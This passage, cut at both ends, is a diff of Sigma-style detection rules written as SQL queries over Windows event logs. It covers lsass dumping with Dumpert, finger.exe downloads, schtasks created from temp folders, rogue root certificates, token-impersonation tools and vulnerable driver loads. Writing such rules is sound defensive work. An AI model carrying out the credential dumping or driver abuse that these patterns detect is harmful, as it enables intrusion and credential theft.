LIKE '% -Path %' ESCAPE '\\' AND ContextInfo LIKE '% -DestinationPath %' ESCAPE '\\' AND ContextInfo LIKE '%$env:TEMP\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /create %' ESCAPE '\\' AND (CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs%' ESCAPE '\\')) OR (ParentCommandLine LIKE '%\\\\svchost.exe -k netsvcs -p -s Schedule' ESCAPE '\\' AND (CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs%' ESCAPE '\\'))) AND NOT (((CommandLine LIKE '%update\\_task.xml%' ESCAPE '\\' OR CommandLine LIKE '%/Create /TN TVInstallRestore /TR%' ESCAPE '\\') OR ParentCommandLine LIKE '%unattended.ini%' ESCAPE '\\') OR (CommandLine LIKE '%/Create /Xml \"C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\.CR.%' ESCAPE '\\' AND CommandLine LIKE '%Avira\\_Security\\_Installation.xml%' ESCAPE '\\') OR (CommandLine LIKE '%/Create /F /TN%' ESCAPE '\\' AND CommandLine LIKE '%/Xml %' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\is-%' ESCAPE '\\' AND CommandLine LIKE '%Avira\\_%' ESCAPE '\\' AND (CommandLine LIKE '%.tmp\\\\UpdateFallbackTask.xml%' ESCAPE '\\' OR CommandLine LIKE '%.tmp\\\\WatchdogServiceControlManagerTimeout.xml%' ESCAPE '\\' OR CommandLine LIKE '%.tmp\\\\SystrayAutostart.xml%' ESCAPE '\\' OR CommandLine LIKE '%.tmp\\\\MaintenanceTask.xml%' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%/Create /TN \"klcp\\_update\" /XML %' ESCAPE '\\' AND CommandLine LIKE '%\\\\klcp\\_update\\_task.xml%' ESCAPE '\\')))" ], - "filename": "posh_pm_susp_zip_compress.yml" + "filename": "proc_creation_win_schtasks_env_folder.yml" }, { - "title": "Suspicious Get Local Groups Information", - "id": "cef24b90-dddc-4ae1-a09a-8764872f69fc", - "status": "test", - "description": "Adversaries may attempt to find local system groups and permission settings.\nThe knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group.\nAdversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.\n", - "author": "frack113", + "title": "Finger.exe Suspicious Invocation", + "id": "af491bca-e752-4b44-9c86-df5680533dbc", + "status": "experimental", + "description": "Detects suspicious aged finger.exe tool execution often used in malware attacks nowadays", + "author": "Florian Roth (Nextron Systems), omkar72, oscd.community", "tags": [ - "attack.discovery", - "attack.t1069.001" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Administrator script" + "Admin activity (unclear what they do nowadays with finger.exe)" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((Payload LIKE '%get-localgroup%' ESCAPE '\\' OR Payload LIKE '%Get-LocalGroupMember%' ESCAPE '\\') OR (ContextInfo LIKE '%get-localgroup%' ESCAPE '\\' OR ContextInfo LIKE '%Get-LocalGroupMember%' ESCAPE '\\') OR (Payload LIKE '%Get-WMIObject%' ESCAPE '\\' AND Payload LIKE '%Win32\\_Group%' ESCAPE '\\') OR (ContextInfo LIKE '%Get-WMIObject%' ESCAPE '\\' AND ContextInfo LIKE '%Win32\\_Group%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'finger.exe' OR NewProcessName LIKE '%\\\\finger.exe' ESCAPE '\\'))" ], - "filename": "posh_pm_susp_local_group_reco.yml" + "filename": "proc_creation_win_finger_usage.yml" }, { - "title": "Suspicious Get-ADDBAccount Usage", - "id": "b140afd9-474b-4072-958e-2ebb435abd68", + "title": "HackTool - Dumpert Process Dumper Execution", + "id": "2704ab9e-afe2-4854-a3b1-0c0706d03578", "status": "test", - "description": "Detects suspicious invocation of the Get-ADDBAccount script that reads from a ntds.dit file and may be used to get access to credentials without using any credential dumpers", + "description": "Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.t1003.003" + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Very unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%Get-ADDBAccount%' ESCAPE '\\' AND Payload LIKE '%BootKey %' ESCAPE '\\' AND Payload LIKE '%DatabasePath %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Hashes LIKE '%09D278F9DE118EF09163C6140255C690%' ESCAPE '\\' OR CommandLine LIKE '%Dumpert.dll%' ESCAPE '\\'))" ], - "filename": "posh_pm_get_addbaccount.yml" + "filename": "proc_creation_win_hktl_dumpert.yml" }, { - "title": "Invoke-Obfuscation Via Use Clip - PowerShell Module", - "id": "ebdf49d8-b89c-46c9-8fdf-2c308406f6bd", + "title": "Dism Remove Online Package", + "id": "43e32da2-fdd0-4156-90de-50dfd62636f9", "status": "experimental", - "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Deployment Image Servicing and Management tool. DISM is used to enumerate, install, uninstall, configure, and update features and packages in Windows images", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate script" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '(?i).*?echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?).*')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\DismHost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%/Online%' ESCAPE '\\' AND ParentCommandLine LIKE '%/Disable-Feature%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\Dism.exe' ESCAPE '\\' AND CommandLine LIKE '%/Online%' ESCAPE '\\' AND CommandLine LIKE '%/Disable-Feature%' ESCAPE '\\')))" ], - "filename": "posh_pm_invoke_obfuscation_via_use_clip.yml" + "filename": "proc_creation_win_dsim_remove.yml" }, { - "title": "Process Hacker and System Informer Driver Load", - "id": "67add051-9ee7-4ad3-93ba-42935615ae8d", + "title": "Computer Discovery And Export Via Get-ADComputer Cmdlet", + "id": "435e10e4-992a-4281-96f3-38b11106adde", "status": "experimental", - "description": "Detects the load of drivers used by Process Hacker and System Informer", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "cve.2021.21551", - "attack.t1543" + "attack.discovery", + "attack.t1033" ], "falsepositives": [ - "Legitimate user of process hacker or system informer by low level developers or system administrators" + "Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\kprocesshacker.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\SystemInformer.sys' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=821D74031D3F625BCBD0DF08B70F1E77%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=F86759BB4DE4320918615DC06E998A39%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0A64EEB85419257D0CE32BD5D55C3A18%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6E7B34DFC017700B1517B230DF6FF0D0%' ESCAPE '\\') OR Imphash IN ('821D74031D3F625BCBD0DF08B70F1E77', 'F86759BB4DE4320918615DC06E998A39', '0A64EEB85419257D0CE32BD5D55C3A18', '6E7B34DFC017700B1517B230DF6FF0D0') OR (Hashes LIKE '%SHA256=8B9AD98944AC9886EA4CB07700E71B78BE4A2740934BB7E46CA3B56A7C59AD24%' ESCAPE '\\' OR Hashes LIKE '%SHA256=A41348BEC147CA4D9EA2869817527EB5CEA2E20202AF599D2B30625433BCF454%' ESCAPE '\\' OR Hashes LIKE '%SHA256=38EE0A88AF8535A11EFE8D8DA9C6812AA07067B75A64D99705A742589BDD846D%' ESCAPE '\\' OR Hashes LIKE '%SHA256=A773891ACF203A7EB0C0D30942FB1347648F1CD918AE2BFD9A4857B4DCF5081B%' ESCAPE '\\' OR Hashes LIKE '%SHA256=4C3B81AC88A987BBDF7D41FA0AECC2CEDF5B9BD2F45E7A21F376D05345FC211D%' ESCAPE '\\' OR Hashes LIKE '%SHA256=3241BC14BEC51CE6A691B9A3562E5C1D52E9D057D27A3D67FD0B245C350B6D34%' ESCAPE '\\' OR Hashes LIKE '%SHA256=047C42E9BBA28366868847C7DAFC1E043FB038C796422D37220493517D68EE89%' ESCAPE '\\' OR Hashes LIKE '%SHA256=18931DC81E95D0020466FA091E16869DBE824E543A4C2C8FE644FA71A0F44FEB%' ESCAPE '\\' OR Hashes LIKE '%SHA256=B4C2EF76C204273132FDE38F0DED641C2C5EE767652E64E4C4071A4A973B6C1B%' ESCAPE '\\' OR Hashes LIKE '%SHA256=640954AFC268565F7DAA6E6F81A8EE05311E33E34332B501A3C3FE5B22ADEA97%' ESCAPE '\\' OR Hashes LIKE '%SHA256=251BE949F662C838718F8AA0A5F8211FB90346D02BD63FF91E6B224E0E01B656%' ESCAPE '\\' OR Hashes LIKE '%SHA256=E2606F272F7BA054DF16BE464FDA57211EF0D14A0D959F9C8DCB0575DF1186E4%' ESCAPE '\\' OR Hashes LIKE '%SHA256=3A9E1D17BEEB514F1B9B3BACAEE7420285DE5CBDCE89C5319A992C6CBD1DE138%' ESCAPE '\\') OR sha256 IN ('8b9ad98944ac9886ea4cb07700e71b78be4a2740934bb7e46ca3b56a7c59ad24', 'a41348bec147ca4d9ea2869817527eb5cea2e20202af599d2b30625433bcf454', '38ee0a88af8535a11efe8d8da9c6812aa07067b75a64d99705a742589bdd846d', 'a773891acf203a7eb0c0d30942fb1347648f1cd918ae2bfd9a4857b4dcf5081b', '4c3b81ac88a987bbdf7d41fa0aecc2cedf5b9bd2f45e7a21f376d05345fc211d', '3241bc14bec51ce6a691b9a3562e5c1d52e9d057d27a3d67fd0b245c350b6d34', '047c42e9bba28366868847c7dafc1e043fb038c796422d37220493517d68ee89', '18931dc81e95d0020466fa091e16869dbe824e543a4c2c8fe644fa71a0f44feb', 'b4c2ef76c204273132fde38f0ded641c2c5ee767652e64e4c4071a4a973b6c1b', '640954afc268565f7daa6e6f81a8ee05311e33e34332b501a3c3fe5b22adea97', '251be949f662c838718f8aa0a5f8211fb90346d02bd63ff91e6b224e0e01b656', 'e2606f272f7ba054df16be464fda57211ef0d14a0d959f9c8dcb0575df1186e4', '3a9e1d17beeb514f1b9b3bacaee7420285de5cbdce89c5319a992c6cbd1de138'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%Get-ADComputer %' ESCAPE '\\' AND CommandLine LIKE '% -Filter \\*' ESCAPE '\\' AND (CommandLine LIKE '% > %' ESCAPE '\\' OR CommandLine LIKE '% | Select %' ESCAPE '\\' OR CommandLine LIKE '%Out-File%' ESCAPE '\\' OR CommandLine LIKE '%Set-Content%' ESCAPE '\\' OR CommandLine LIKE '%Add-Content%' ESCAPE '\\')))" ], - "filename": "driver_load_win_process_hacker.yml" + "filename": "proc_creation_win_powershell_computer_discovery_get_adcomputer.yml" }, { - "title": "Vulnerable Lenovo Driver Load", - "id": "ac683a42-877b-4ff8-91ac-69e94b0f70b4", + "title": "Root Certificate Installed From Susp Locations", + "id": "5f6a601c-2ecb-498b-9c33-660362323afa", "status": "experimental", - "description": "Detects the load of the vulnerable Lenovo driver as reported in CVE-2022-3699 which can be used to escalate privileges", - "author": "Florian Roth (Nextron Systems)", + "description": "Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "cve.2021.21551", - "attack.t1543" + "attack.defense_evasion", + "attack.t1553.004" ], "falsepositives": [ - "Legitimate driver loads (old driver that didn't receive an update)" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((Hashes LIKE '%SHA256=F05B1EE9E2F6AB704B8919D5071BECBCE6F9D0F9D0BA32A460C41D5272134ABE%' ESCAPE '\\' OR Hashes LIKE '%SHA1=B89A8EEF5AEAE806AF5BA212A8068845CAFDAB6F%' ESCAPE '\\' OR Hashes LIKE '%MD5=B941C8364308990EE4CC6EADF7214E0F%' ESCAPE '\\') OR sha256 = 'f05b1ee9e2f6ab704b8919d5071becbce6f9d0f9d0ba32a460c41d5272134abe' OR sha1 = 'b89a8eef5aeae806af5ba212a8068845cafdab6f' OR md5 = 'b941c8364308990ee4cc6eadf7214e0f')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%Import-Certificate%' ESCAPE '\\' AND CommandLine LIKE '% -FilePath %' ESCAPE '\\' AND CommandLine LIKE '%Cert:\\\\LocalMachine\\\\Root%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" ], - "filename": "driver_load_win_vuln_lenovo_driver.yml" + "filename": "proc_creation_win_powershell_import_cert_susp_locations.yml" }, { - "title": "Vulnerable HackSys Extreme Vulnerable Driver Load", - "id": "295c9289-acee-4503-a571-8eacaef36b28", + "title": "HackTool - Impersonate Execution", + "id": "cf0c254b-22f1-4b2b-8221-e137b3c0af94", "status": "experimental", - "description": "Detects the load of HackSys Extreme Vulnerable Driver which is an intentionally vulnerable Windows driver developed for security enthusiasts to learn and polish their exploitation skills at Kernel level and often abused by threat actors", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects execution of the Impersonate tool. Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively", + "author": "Sai Prashanth Pulisetti @pulisettis", "tags": [ "attack.privilege_escalation", - "attack.t1543.003" + "attack.defense_evasion", + "attack.t1134.001", + "attack.t1134.003" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\HEVD.sys' ESCAPE '\\' OR (Hashes LIKE '%IMPHASH=f26d0b110873a1c7d8c4f08fbeab89c5%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=c46ea2e651fd5f7f716c8867c6d13594%' ESCAPE '\\') OR Imphash IN ('f26d0b110873a1c7d8c4f08fbeab89c5', 'c46ea2e651fd5f7f716c8867c6d13594'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%impersonate.exe%' ESCAPE '\\' AND (CommandLine LIKE '% list %' ESCAPE '\\' OR CommandLine LIKE '% exec %' ESCAPE '\\' OR CommandLine LIKE '% adduser %' ESCAPE '\\')) OR ((Hashes LIKE '%MD5=9520714AB576B0ED01D1513691377D01%' ESCAPE '\\' OR Hashes LIKE '%SHA256=E81CC96E2118DC4FBFE5BAD1604E0AC7681960143E2101E1A024D52264BB0A8A%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0A358FFC1697B7A07D0E817AC740DF62%' ESCAPE '\\') OR md5 = '9520714AB576B0ED01D1513691377D01' OR sha256 = 'E81CC96E2118DC4FBFE5BAD1604E0AC7681960143E2101E1A024D52264BB0A8A' OR Imphash = '0A358FFC1697B7A07D0E817AC740DF62')))" ], - "filename": "driver_load_win_vuln_hevd_driver.yml" + "filename": "proc_creation_win_hktl_impersonate.yml" }, { - "title": "PowerShell Scripts Run by a Services", - "id": "46deb5e1-28c9-4905-b2df-51cdcc9e6073", + "title": "Ps.exe Renamed SysInternals Tool", + "id": "18da1007-3f26-470f-875d-f77faf1cab31", "status": "test", - "description": "Detects powershell script installed as a Service", - "author": "oscd.community, Natalia Shornikova", + "description": "Detects renamed SysInternals tool execution with a binary named ps.exe as used by Dragonfly APT group and documented in TA17-293A report", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1569.002" + "attack.defense_evasion", + "attack.g0035", + "attack.t1036.003", + "car.2013-05-009" ], "falsepositives": [ - "Unknown" + "Renamed SysInternals tool" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%powershell%' ESCAPE '\\' OR ImageLoaded LIKE '%pwsh%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine = 'ps.exe -accepteula')" ], - "filename": "driver_load_win_powershell_script_installed_as_service.yml" + "filename": "proc_creation_win_apt_ta17_293a_ps.yml" }, { - "title": "Vulnerable Driver Load By Name", - "id": "c316eac1-f3d8-42da-ad1c-66dcec5ca787", + "title": "Schtasks From Suspicious Folders", + "id": "8a8379b8-780b-4dbf-b1e9-31c8d112fefb", "status": "experimental", - "description": "Detects the load of known vulnerable drivers via their names only.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects scheduled task creations that have suspicious action command and folder combinations", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1543.003", - "attack.t1068" + "attack.execution", + "attack.t1053.005" ], "falsepositives": [ - "False positives may occur if one of the vulnerable driver names mentioned above didn't change its name between versions. So always make sure that the driver being loaded is the legitimate one and the non vulnerable version.", - "If you experience a lot of FP you could comment the driver name or its exact known legitimate location (when possible)" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\ADV64DRV.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Agent64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ALSysIO64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\amifldrv64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsIO.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsIO64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asmmap64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsrAutoChkUpdDrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsrDrv10.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsrDrv101.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsrIbDrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsrOmgDrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsrRapidStartDrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsrSmartConnectDrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsUpIO.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\atillk64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\BS\\_Def64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\CITMDRV\\_AMD64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\CITMDRV\\_IA64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cpuz\\_x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cpuz141.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbutil\\_2\\_3.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Dh\\_Kernel\\_10.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Dh\\_Kernel.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\GLCKIO2.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\HOSTNT.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\HwRwDrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\inpoutx64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iomem64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Mhyprot2.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\MsIo64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msrhook.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NTIOLib.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\OpenLibSys.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Se64a.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\smep\\_capcom.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\smep\\_namco.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\SysInfo.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\VProEventMonitor.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WCPU.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WINIODrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\physmem.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\procexp152.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\viraglt64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vboxdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rwdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\speedfan.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\kprocesshacker.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sandra.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\elbycdio.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\goad.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\aswsnx.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sandbox.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nicm.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nscm.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ncpl.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\elrawdsk.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\DBUtilDrv2.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\BS\\_RCIO64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mhyprot.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\EneTechIo64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\amp.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\EneIo64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ATSZIO.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NalDrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\DirectIo32.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\DirectIo64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsUpIO64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsrDrv102.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsrDrv103.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\BSMEMx64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\BSMIXP64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\BSMIx64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\BS\\_Flash64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\BS\\_HWMIO64\\_W10.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\BS\\_HWMIo64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\BS\\_I2c64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\GVCIDrv64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\HwOs2Ec10x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\HwOs2Ec7x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NBIOLib\\_X64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NCHGBIOS2x64.SYS' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NTIOLib\\_X64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\PhlashNT.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Phymemx64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\UCOREW64.SYS' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinFlash64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbk64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mtcBSv64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nvflash.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nvflsh64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\phymem64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtkio64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtkiow10x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtkiow8x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\segwindrvx64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\superbmc.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\semav6msr.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\piddrv64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\BS\\_I2cIo.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtkio.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AMDRyzenMasterDriver.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\LHA.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\kEvP64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\BSMI.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\TmComm.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cpuz.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iQVW64.SYS' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iQVW32.SYS' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vmdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\HpPortIox64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AMDPowerProfiler.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\CorsairLLAccess64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\RTCore64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\libnicm.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\procexp.Sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\viragt.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\viragt64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsrDrv106.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\zamguard64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\zam64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fidpcidrv64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\MsIo32.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winio64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\capcom.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\IOMap64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ATSZIO64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\aswVmm.sys' ESCAPE '\\' OR ImageLoaded LIKE 